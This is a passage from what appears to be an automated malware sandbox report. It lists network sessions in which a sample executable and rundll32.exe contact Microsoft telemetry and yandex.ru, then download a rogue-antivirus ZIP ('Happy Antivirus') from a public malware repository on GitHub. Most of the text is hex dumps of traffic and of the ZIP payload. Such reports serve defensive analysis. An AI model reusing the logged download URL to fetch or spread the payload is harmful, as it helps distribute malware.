                                                                                                                                                Data Ascii: iIpd*jP1?&ei!G+{6U>P]G8G@(5zJ&+~fTG{2&@|hgP&8vxpARr;IL^wn>OrI,$l//~ 1o\!L,~s5~n}:MY"w{74D*4NF[-
                                                                                                                                                2022-09-29 12:49:54 UTC11978INData Raw: 47 c9 4c f8 85 c4 6c b0 f4 24 66 02 72 c8 c0 03 6e 50 30 77 78 e9 91 8d 4b f9 3b cf f9 e1 97 cc b2 ae 5d b5 f4 92 b4 5a 11 99 97 e4 1e bc 45 8d 3b 52 59 28 ad c5 51 7b d4 7c df 81 50 41 e6 88 3a 8f b6 51 1a a2 4f 91 b6 da 6d dd c5 ba d5 a0 d5 f6 29 92 f1 9e 2f 67 c8 50 d0 2b 2b b5 d3 fc 7d 4d a8 8f a2 3b de 48 dd 09 86 aa 5e 75 01 2b 3d 39 fe c4 ee c4 16 f2 82 ca 19 90 f3 44 89 66 46 7a 31 3f 84 09 28 a8 41 50 f8 b0 b0 6b 3d c5 43 ab 92 3f fe 7e 5b df 1b 1b 08 68 21 89 8d 03 e4 a3 23 5f 61 76 50 17 9f 4f 11 df fa 02 0b b2 f0 ba e5 c1 1f 86 84 67 b6 19 35 dd 06 64 34 55 7d ed 2d 76 82 8b 4d 78 54 d7 27 ab e2 26 9e c4 c9 da 07 27 9a 84 21 05 75 8d b2 09 26 36 2a 61 23 53 87 29 da 0b c0 3a e2 df 3d 14 49 fc 2b 9d 47 b4 47 49 88 58 a3 1a 1b 3c 51 ff ec 98 6d
                                                                                                                                                Data Ascii: GLl$frnP0wxK;]ZE;RY(Q{|PA:QOm)/gP++}M;H^u+=9DfFz1?(APk=C?~[h!#_avPOg5d4U}-vMxT'&'!u&6*a#S):=I+GGIX<Qm


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                81192.168.2.349770104.208.16.94443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:49:57 UTC11994OUTPOST /Telemetry.Request HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                User-Agent: MSDW
                                                                                                                                                MSA_DeviceTicket_Error: 0x800704cf
                                                                                                                                                Content-Length: 4664
                                                                                                                                                Host: watson.telemetry.microsoft.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                82192.168.2.34977577.88.55.50443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:49:57 UTC11994OUTGET /1001 HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Accept: */*
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                Host: yandex.ru
                                                                                                                                                Cookie: _yasc=ci6rbjmrlQgO0axLw7w6OWn+wuU8RFP050vqcbO+koLLPW4r; is_gdpr_b=CPe0cBDfjAEYAQ==; is_gdpr=1
                                                                                                                                                2022-09-29 12:49:58 UTC11994INHTTP/1.1 404 Not Found
                                                                                                                                                Accept-CH: Viewport-Width, DPR, Device-Memory, RTT, Downlink, ECT
                                                                                                                                                Accept-CH-Lifetime: 31536000
                                                                                                                                                Cache-Control: no-cache,no-store,max-age=0,must-revalidate
                                                                                                                                                Connection: Close
                                                                                                                                                Content-Length: 17232
                                                                                                                                                Content-Security-Policy-Report-Only: connect-src https://*.mc.yandex.ru https://adstat.yandex.ru https://mc.admetrica.ru https://mc.yandex.ru https://yabs.yandex.ru https://yandex.ru;default-src 'none';frame-src https://*.ya.ru https://*.yandex.ru https://mc.yandex.md https://mc.yandex.ru https://ya.ru https://yandex.ru;img-src 'self' data: https://*.mc.yandex.ru https://*.verify.yandex.ru https://*.ya.ru https://*.yandex.ru https://adstat.yandex.ru https://avatars.mds.yandex.net https://favicon.yandex.net https://mc.admetrica.ru https://mc.yandex.com https://mc.yandex.ru https://ya.ru https://yabs.yandex.ru https://yandex.ru https://yastatic.net;report-uri https://csp.yandex.net/csp?project=morda&from=morda.intercept404.ru&showid=1664455798.03116.95800.77213&h=stable-morda-any-sas-yp-9&yandexuid=8210726791664455798;script-src 'unsafe-inline' https://*.mc.yandex.ru https://adstat.yandex.ru https://mc.yandex.ru https://yandex.ru https://yastatic.net;style-src 'unsafe-inline' https://yastatic.net
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Date: Thu, 29 Sep 2022 12:49:58 GMT
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:49:58 GMT
                                                                                                                                                Last-Modified: Thu, 29 Sep 2022 12:49:58 GMT
                                                                                                                                                NEL: {"report_to": "network-errors", "max_age": 100, "success_fraction": 0.001, "failure_fraction": 0.1}
                                                                                                                                                P3P: policyref="/w3c/p3p.xml", CP="NON DSP ADM DEV PSD IVDo OUR IND STP PHY PRE NAV UNI"
                                                                                                                                                Report-To: { "group": "network-errors", "max_age": 100, "endpoints": [{"url": "https://dr.yandex.net/nel", "priority": 1}, {"url": "https://dr2.yandex.net/nel", "priority": 2}]}
                                                                                                                                                Set-Cookie: i=mzwIFKdMjJYbMlcq4dxyb2QmAinwt40crUN3pWwnWfp03/WaPvZSdcXT26wgvuCtCyKkTww1dDT4y6FhQBmah1uYfeI=; Expires=Sat, 28-Sep-2024 12:49:58 GMT; Domain=.yandex.ru; Path=/; Secure; HttpOnly
                                                                                                                                                Vary: Cookie,Accept-Language,Accept-Encoding
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                2022-09-29 12:49:58 UTC11996INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 20 20 63 6c 61 73 73 3d 22 69 2d 75 61 5f 6a 73 5f 6e 6f 20 69 2d 75 61 5f 63 73 73 5f 73 74 61 6e 64 61 72 74 20 69 2d 75 61 5f 62 72 6f 77 73 65 72 5f 75 6e 6b 6e 6f 77 6e 20 69 2d 75 61 5f 62 72 6f 77 73 65 72 2d 65 6e 67 69 6e 65 5f 75 6e 6b 6e 6f 77 6e 20 69 2d 75 61 5f 62 72 6f 77 73 65 72 5f 64 65 73 6b 74 6f 70 20 69 2d 75 61 5f 70 6c 61 74 66 6f 72 6d 5f 77 69 6e 64 6f 77 73 22 20 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 20 20 78 6d 6c 6e 73 3a 6f 67 3d 22 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73
                                                                                                                                                Data Ascii: <!DOCTYPE html><html class="i-ua_js_no i-ua_css_standart i-ua_browser_unknown i-ua_browser-engine_unknown i-ua_browser_desktop i-ua_platform_windows" lang="ru"><head xmlns:og="http://ogp.me/ns#"><meta http-equiv='Content-Type' content='text/html;chars
                                                                                                                                                2022-09-29 12:49:58 UTC12003INData Raw: 6f 74 3b 75 72 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 2f 2f 79 61 6e 64 65 78 2e 72 75 2f 73 75 67 67 65 73 74 2f 73 75 67 67 65 73 74 2d 79 61 2e 63 67 69 3f 73 72 76 3d 6d 6f 72 64 61 5f 72 75 5f 64 65 73 6b 74 6f 70 26 61 6d 70 3b 77 69 7a 3d 54 72 57 74 68 26 61 6d 70 3b 75 69 6c 3d 72 75 26 61 6d 70 3b 66 61 63 74 3d 31 26 61 6d 70 3b 76 3d 34 26 61 6d 70 3b 69 63 6f 6e 3d 31 26 61 6d 70 3b 6c 72 3d 32 31 33 26 61 6d 70 3b 68 6c 3d 31 26 61 6d 70 3b 62 65 6d 6a 73 6f 6e 3d 30 26 61 6d 70 3b 68 74 6d 6c 3d 31 26 61 6d 70 3b 70 6c 61 74 66 6f 72 6d 3d 64 65 73 6b 74 6f 70 26 61 6d 70 3b 72 69 63 68 5f 6e 61 76 3d 31 26 61 6d 70 3b 73 68 6f 77 5f 65 78 70 65 72 69 6d 65 6e 74 3d 32 32 32 26 61 6d 70 3b 73 68 6f 77 5f 65 78 70 65 72 69 6d 65 6e 74 3d
                                                                                                                                                Data Ascii: ot;url&quot;:&quot;//yandex.ru/suggest/suggest-ya.cgi?srv=morda_ru_desktop&amp;wiz=TrWth&amp;uil=ru&amp;fact=1&amp;v=4&amp;icon=1&amp;lr=213&amp;hl=1&amp;bemjson=0&amp;html=1&amp;platform=desktop&amp;rich_nav=1&amp;show_experiment=222&amp;show_experiment=
                                                                                                                                                2022-09-29 12:49:58 UTC12005INData Raw: 6c 3d 22 d0 97 d0 b0 d0 bf d1 80 d0 be d1 81 22 20 69 64 3d 22 74 65 78 74 22 20 6d 61 78 6c 65 6e 67 74 68 3d 22 34 30 30 22 20 6e 61 6d 65 3d 22 74 65 78 74 22 2f 3e 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 27 73 65 61 72 63 68 32 5f 5f 62 75 74 74 6f 6e 27 3e 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 74 74 6f 6e 20 6d 69 6e 69 2d 73 75 67 67 65 73 74 5f 5f 62 75 74 74 6f 6e 20 62 75 74 74 6f 6e 5f 74 68 65 6d 65 5f 73 65 61 72 63 68 20 62 75 74 74 6f 6e 5f 73 69 7a 65 5f 73 65 61 72 63 68 20 69 2d 62 65 6d 22 20 64 61 74 61 2d 62 65 6d 3d 22 7b 26 71 75 6f 74 3b 62 75 74 74 6f 6e 26 71 75 6f 74 3b 3a 7b 7d 7d 22 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 20 72 6f 6c 65 3d 22 62 75 74 74 6f 6e
                                                                                                                                                Data Ascii: l="" id="text" maxlength="400" name="text"/></span></span></div><div class='search2__button'><button class="button mini-suggest__button button_theme_search button_size_search i-bem" data-bem="{&quot;button&quot;:{}}" tabindex="-1" role="button
                                                                                                                                                2022-09-29 12:49:58 UTC12007INData Raw: 2d 69 74 65 6d 27 3e 3c 73 70 61 6e 20 20 63 6c 61 73 73 3d 22 20 73 65 72 76 69 63 65 73 5f 5f 69 63 6f 6e 20 73 65 72 76 69 63 65 73 5f 5f 69 63 6f 6e 5f 6d 61 72 6b 65 74 22 3e 3c 2f 73 70 61 6e 3e 3c 61 20 63 6c 61 73 73 3d 22 68 6f 6d 65 2d 6c 69 6e 6b 20 20 73 65 72 76 69 63 65 73 5f 5f 74 69 74 6c 65 2d 6c 69 6e 6b 20 68 6f 6d 65 2d 6c 69 6e 6b 5f 62 6c 75 65 5f 79 65 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 72 6b 65 74 2e 79 61 6e 64 65 78 2e 72 75 2f 3f 63 6c 69 64 3d 35 36 38 26 75 74 6d 5f 73 6f 75 72 63 65 3d 66 61 63 65 5f 74 69 74 6c 65 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 63 70 63 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 66 74 5f 64 65 73 6b 74 6f 70 5f 73 6d 61 72 74 70 68 6f 6e 65 5f 78 69 61 6f 6d 69 5f 61 6c 6c 22 20 64
                                                                                                                                                Data Ascii: -item'><span class=" services__icon services__icon_market"></span><a class="home-link services__title-link home-link_blue_yes" href="https://market.yandex.ru/?clid=568&utm_source=face_title&utm_medium=cpc&utm_campaign=ft_desktop_smartphone_xiaomi_all" d
                                                                                                                                                2022-09-29 12:49:58 UTC12011INData Raw: 79 61 2e 72 75 2f 22 20 64 61 74 61 2d 73 74 61 74 6c 6f 67 3d 22 79 61 6e 64 65 78 22 20 64 61 74 61 2d 73 74 61 74 6c 6f 67 2d 73 68 6f 77 65 64 3d 22 31 22 3e d0 af d0 bd d0 b4 d0 b5 d0 ba d1 81 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 20 20 3e 77 69 6e 64 6f 77 2e 68 6f 6d 65 3d 77 69 6e 64 6f 77 2e 68 6f 6d 65 7c 7c 7b 7d 3b 77 69 6e 64 6f 77 2e 68 6f 6d 65 5b 27 65 78 70 6f 72 74 27 5d 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 22 7b 5c 22 63 6f 6d 6d 6f 6e 5c 22 3a 7b 5c 22 63 6c 69 63 6b 2d 68 72 65 66 5c 22 3a 5c 22 68 74 74 70 73 3a 2f 2f 79 61 6e 64 65 78 2e 72 75 2f 63 6c 63 6b 2f 5c 22 7d 2c 5c 22 73 74 61 74 6c 6f 67 5c 22 3a 7b 5c 22 63 6f 6e 66 69 67 5c 22 3a 7b 5c 22 73 74 61 74 52 6f 6f 74 5c 22 3a 5c 22 65 72 72 6f 72 34 30 34 2e 64
                                                                                                                                                Data Ascii: ya.ru/" data-statlog="yandex" data-statlog-showed="1"></a></div><script >window.home=window.home||{};window.home['export']=JSON.parse("{\"common\":{\"click-href\":\"https://yandex.ru/clck/\"},\"statlog\":{\"config\":{\"statRoot\":\"error404.d


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                83192.168.2.349781140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:50:04 UTC12013OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Happy%20Antivirus.zip HTTP/1.1
                                                                                                                                                Host: github.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                84140.82.121.4443192.168.2.349781C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:50:04 UTC12013INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:04 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Happy%20Antivirus.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:50:04 UTC12014INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                85192.168.2.349782185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:50:05 UTC12015OUTGET /Endermanch/MalwareDatabase/master/rogues/Happy%20Antivirus.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                86185.199.108.133443192.168.2.349782C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:50:05 UTC12016INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 1721302
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "bb71b3fc58fb603cf14e33295d1c8eaf2a0ad05101b7a8b78df809147209e36e"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 9B5A:0543:E4C62A:F30433:63359351
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:05 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6962-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455805.174446,VS0,VE3
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: a30b0fc3024ba119a5f8d34c1ee99de60b276665
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:55:05 GMT
                                                                                                                                                Source-Age: 299
                                                                                                                                                2022-09-29 12:50:05 UTC12016INData Raw: 50 4b 03 04 14 00 01 00 08 00 1c 34 33 4c d9 8f 00 b3 16 43 1a 00 00 a2 1e 00 1d 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 48 61 70 70 79 41 6e 74 69 76 69 72 75 73 2e 65 78 65 f8 2b 0e 2e 8c 29 68 4b e2 fb 48 16 3b 20 4e 07 3a 4e 83 02 e6 8c a5 48 55 e4 32 b4 95 93 c6 a0 c3 7c ab 92 e0 87 d0 02 d5 04 78 62 70 65 75 9a 97 86 11 34 98 97 cd 97 73 74 dc 2c 4f 22 09 b0 c7 96 32 1d dc ca 93 24 ea 9d 57 89 17 31 56 cd df 61 9d e8 1e 3e f6 5c 66 8d 23 70 99 5c 0c 9a 19 24 e2 d8 c2 3c 6d a8 d2 5a be fc 3a 13 61 f6 f5 7a b5 d9 f8 42 70 0a 62 f9 42 c3 b2 50 ae e2 70 4f 5a 25 72 a4 ee b3 0f 10 eb e1 04 4a 1a c8 a6 26 29 7b ed 6e 8c cf 45 da 01 e7 d0 73 ba 2b 43 92 58 a7 d6 5f be fa 1e 84 cd ad fd 63 14 66 6a db 88 d7 78 2b d4 d3 70 17 58 a2 ea 55 e1 92 3a 15 2f 21
                                                                                                                                                Data Ascii: PK43LCEndermanch@HappyAntivirus.exe+.)hKH; N:NHU2|xbpeu4st,O"2$W1Va>\f#p\$<mZ:azBpbBPpOZ%rJ&){nEs+CX_cfjx+pXU:/!
                                                                                                                                                2022-09-29 12:50:05 UTC12032INData Raw: 61 57 01 dc 2e e3 8a 3c 66 e0 6f 4c ce b1 a4 79 75 16 65 0e b6 c9 b5 ff 8a 96 b4 eb ac 3c e7 dc 2b f4 96 68 8e 4f 26 69 a1 e2 0f 54 2e ef ac eb a6 8b 5a 36 09 5a 49 b1 5e e0 58 33 eb 65 05 d5 8e 8c f8 83 a2 05 ec e3 b9 f6 fa 00 6c 6c 77 c8 88 82 6b f9 e9 19 2e 51 80 67 5e 41 1a 85 18 be 67 d2 b6 ec 20 14 7d 65 5a 8d c3 ee f9 b5 cc 7e 8c 3f 48 22 8d 65 7c 3d 28 30 ec 37 f3 47 4f eb 2f 4d 17 31 52 69 9f 67 1b dd 3d 33 c2 3d b6 47 20 60 b7 ae 20 09 32 8a c1 1b 26 19 d6 2e 57 e7 bd 15 94 9b 1d 6a 3e c6 9a a8 fb 46 39 9a 7f 1c ed 06 01 37 cf e1 70 33 b7 cd 75 97 a9 50 19 98 f7 0d e4 07 9f 1c a5 b3 65 c3 52 a5 9a c3 3b 11 0b 8b 65 56 0c 43 76 46 4e b2 17 79 8a 7d cc ff af dd 79 ee ec 47 4d c7 49 e8 a7 a6 b1 3b 41 0c 6e 7b 86 ad c7 6f 17 be 4a 7d 93 eb 2d 07 bc
                                                                                                                                                Data Ascii: aW.<foLyue<+hO&iT.Z6ZI^X3ellwk.Qg^Ag }eZ~?H"e|=(07GO/M1Rig=3=G ` 2&.Wj>F97p3uPeR;eVCvFNy}yGMI;An{oJ}-
                                                                                                                                                2022-09-29 12:50:05 UTC12048INData Raw: dd 0d 55 c5 36 a5 a7 43 53 38 0f 5a eb 00 4d d6 e5 f6 24 78 d7 cc 86 df c4 6e 71 b4 78 df 66 23 92 05 03 f7 e5 b9 bc b6 f5 b0 62 47 9f 25 73 ab e6 87 d0 f7 7e 90 dc 12 b6 cd ef 9a ef 33 e9 fd 73 29 ba 88 cd 62 49 2d 72 6e be 9f d1 57 6a 88 94 5c cc 9c 19 13 db de d0 ad 61 e5 db 74 ed 52 bb 29 92 05 8a 01 39 b4 e6 2d 3d 8a ff 1f 9d a8 5c 2f f8 95 c1 2c 02 22 80 a5 8a 09 ca e5 42 d8 b3 ce 10 b3 75 5d 58 9a 28 e8 34 d8 1d 2e ac 7f df 71 5c 69 82 0a 77 a3 19 9c 8f d4 05 e2 26 e8 4a 0f f5 78 9a 2b 0b 39 94 dd b3 31 1e 25 49 0d 78 85 71 60 30 0b 56 ca 11 d0 c2 d5 6c f4 59 7a d0 53 2a 81 d3 3f f5 d0 49 b8 a0 46 cb a3 c8 34 3b a8 15 29 76 46 da 24 0e a2 49 d3 d0 e1 06 60 4e d5 54 4a 8c a4 45 b2 95 8e 6d cd c0 4e 3a 10 e3 5b 2f 8d 8c 50 26 9d 9f 59 df e8 33 46 25
                                                                                                                                                Data Ascii: U6CS8ZM$xnqxf#bG%s~3s)bI-rnWj\atR)9-=\/,"Bu]X(4.q\iw&Jx+91%Ixq`0VlYzS*?IF4;)vF$I`NTJEmN:[/P&Y3F%
                                                                                                                                                2022-09-29 12:50:05 UTC12064INData Raw: 6b d8 db 7b 99 25 71 50 84 62 dc dd 03 61 e1 86 cc ad 48 87 69 bc 68 67 dd 5c 26 f1 9a 69 66 2a 9c ce 1d 3a cb 81 94 16 8c 46 37 58 1e 02 2e e8 21 f6 6a 80 d0 4c 15 b9 56 a5 06 be 1f 49 fb 2e bf c9 1e ea 64 50 69 3d e3 bb 9c bc 64 a4 73 c6 04 2c dc 1d be d2 de 3b 6c 4e 96 a7 df 12 ed 17 97 ff 92 7b 1f 24 7b 03 53 bc 53 11 34 af 76 f4 1f a3 58 88 6a 8a 13 07 2d 48 bb 5e a7 66 fd 9e eb 9e 5c 0e 0b 6d 73 23 5c 59 98 54 75 f6 d2 8f 85 e6 2c d1 2b 55 f2 2f e8 44 77 7e 1b e3 57 11 0e 8e b8 cc cb f0 db bf c7 fc b3 d9 e9 dd 8d 77 27 2b 00 8c b9 40 48 20 6e 3c 58 4d 63 90 a7 1b 50 8c 03 e0 09 0e d8 9e 4e b9 30 73 a7 1b 51 dc 7e 64 f7 80 b3 8d 80 af 12 6d 03 6a 2a e1 eb 0d 44 ef cb 94 70 79 76 fc d9 ba 30 d5 5e 49 a8 a3 a5 75 97 26 49 5c 5f f8 1c 6a b1 56 15 73 93
                                                                                                                                                Data Ascii: k{%qPbaHihg\&if*:F7X.!jLVI.dPi=ds,;lN{${SS4vXj-H^f\ms#\YTu,+U/Dw~Ww'+@H n<XMcPN0sQ~dmj*Dpyv0^Iu&I\_jVs
                                                                                                                                                2022-09-29 12:50:05 UTC12080INData Raw: a5 24 00 f9 72 f6 23 a7 31 70 ae 59 4a 54 2f 5c c9 07 cd 47 c8 2d 29 0a 62 d5 9b cd 56 41 45 f1 04 d4 aa 29 53 1d cc 33 c8 b8 20 7b 16 43 b6 1f 25 89 36 cc 7b f3 52 8a f4 a6 26 24 4e 2c 57 f0 c2 fe 89 6e 07 37 6c 0f f8 0b 3c e2 ac c0 24 26 4c 22 57 76 1c 94 50 69 e0 74 bc 7d 04 52 11 af 24 fa 58 dd fe 8e e4 5f 31 c0 cd 25 55 d1 24 95 b2 f2 01 cd 87 1c be 6e 1f 19 04 07 cb 00 d1 f7 1e 58 4d bc dd 0d 11 6a 62 44 61 bf 80 16 2e bb 27 23 bb 1e f2 93 da a4 7e e0 80 6f 73 30 53 4a 05 32 56 8a 06 23 b2 71 16 c7 ea cf 30 70 c8 03 7b c6 06 7a 03 62 d2 dc 65 91 42 6c c5 b8 1c ba 04 af 61 9b 29 ff dc 95 d0 d5 ec 2d 6e 06 13 82 db 7e ac 85 f3 db 87 d5 45 76 4a c9 c9 ae c5 30 7c c8 d8 ec 57 d9 63 b8 e3 61 91 81 72 21 a3 b4 b2 03 ce 72 22 fb a1 07 c5 1b f5 87 3f 25 2e
                                                                                                                                                Data Ascii: $r#1pYJT/\G-)bVAE)S3 {C%6{R&$N,Wn7l<$&L"WvPit}R$X_1%U$nXMjbDa.'#~os0SJ2V#q0p{zbeBla)-n~EvJ0|Wcar!r"?%.
                                                                                                                                                2022-09-29 12:50:05 UTC12096INData Raw: bf 46 fb 46 cb 9f 65 88 20 6c ea ce 5f 04 0e fd 5a 42 63 5d df 78 3f d3 43 fa e3 0e 0b d8 05 d0 a5 61 e1 f0 fa 91 95 78 94 df 92 58 eb eb 4e e7 df 24 6d ef ec 05 0a a9 3f 04 1a 04 86 cf 32 7b 63 04 b3 71 f8 be dd eb 77 d1 5f 23 b8 9d ca 15 2d 60 75 40 2f 71 75 11 bb e9 ef 55 32 68 f2 e2 6f e2 59 ec 52 a3 98 ec 40 76 6d dc 36 14 a4 49 4f 36 52 46 c1 5a 1e 2d e4 26 92 e7 66 cf a5 72 1c 86 f4 65 7f 9c 76 56 88 59 82 11 78 87 e9 62 03 fd 13 6e e4 3b 8f 79 91 05 1c 16 bd 29 5b ca a1 3e 05 df f1 51 cd 7a 9c 03 e6 15 ed 08 d9 c9 bb 1e f9 37 d7 93 3c 30 27 fc 12 cc 28 d4 c5 20 b4 e3 95 fc b9 5a cc 91 a4 78 3d ce f0 81 96 b2 03 00 54 b4 a9 a4 36 94 18 f5 f3 bf f5 46 70 b2 56 36 48 9f 5d 0f ec 4a 03 22 74 75 ff 44 e1 9a 92 c2 64 29 2a 5f a7 92 0d a7 10 7f 79 84 76
                                                                                                                                                Data Ascii: FFe l_ZBc]x?CaxXN$m?2{cqw_#-`u@/quU2hoYR@vm6IO6RFZ-&frevVYxbn;y)[>Qz7<0'( Zx=T6FpV6H]J"tuDd)*_yv
                                                                                                                                                2022-09-29 12:50:05 UTC12112INData Raw: 90 fd 8d 78 59 3c 63 64 a9 07 16 b6 8a 11 57 85 20 d5 d5 61 9f 92 cf bd de 5c 15 d1 d8 e5 96 4a 63 a6 a3 01 6f 29 6a c3 94 e9 3e ee 5d 05 3a 1f da c9 37 4b 25 54 03 89 2d f0 8f 9b dc b9 64 4e c7 f2 96 33 28 81 f5 4b 77 9d d2 86 b5 aa c9 a8 14 7d a6 47 d1 81 cf 1c 00 57 6f 3f 13 7a 70 38 38 f7 36 2b 77 28 c0 cd d2 5e c9 7c e8 06 b2 88 48 ce e2 c3 8d 57 16 53 01 92 eb 17 72 d5 8c 9a 80 3a 12 17 5f bd 14 d7 71 ea da 9c e3 a6 fb 2c 11 cf 93 bb 8a 41 6c d8 85 7a 44 fc 64 21 ab 3f 2f b3 38 0b a5 05 3d 9c 8e f3 2e ac 73 eb ac 10 c4 91 e2 4a f3 62 65 15 18 cb 1d 2d 4a 1c 6c 83 98 95 d0 3f 09 4b 5b be c5 5b a7 b3 ae 9a 99 fd 50 08 68 d3 db 51 66 04 70 80 4a ca 60 98 09 dc e0 c7 06 a3 db ca 0d b8 56 8c 00 9f 7e b3 fb 91 3c f3 62 02 c5 d2 76 c2 b5 cb cb 17 51 46 5b
                                                                                                                                                Data Ascii: xY<cdW a\Jco)j>]:7K%T-dN3(Kw}GWo?zp886+w(^|HWSr:_q,AlzDd!?/8=.sJbe-Jl?K[[PhQfpJ`V~<bvQF[
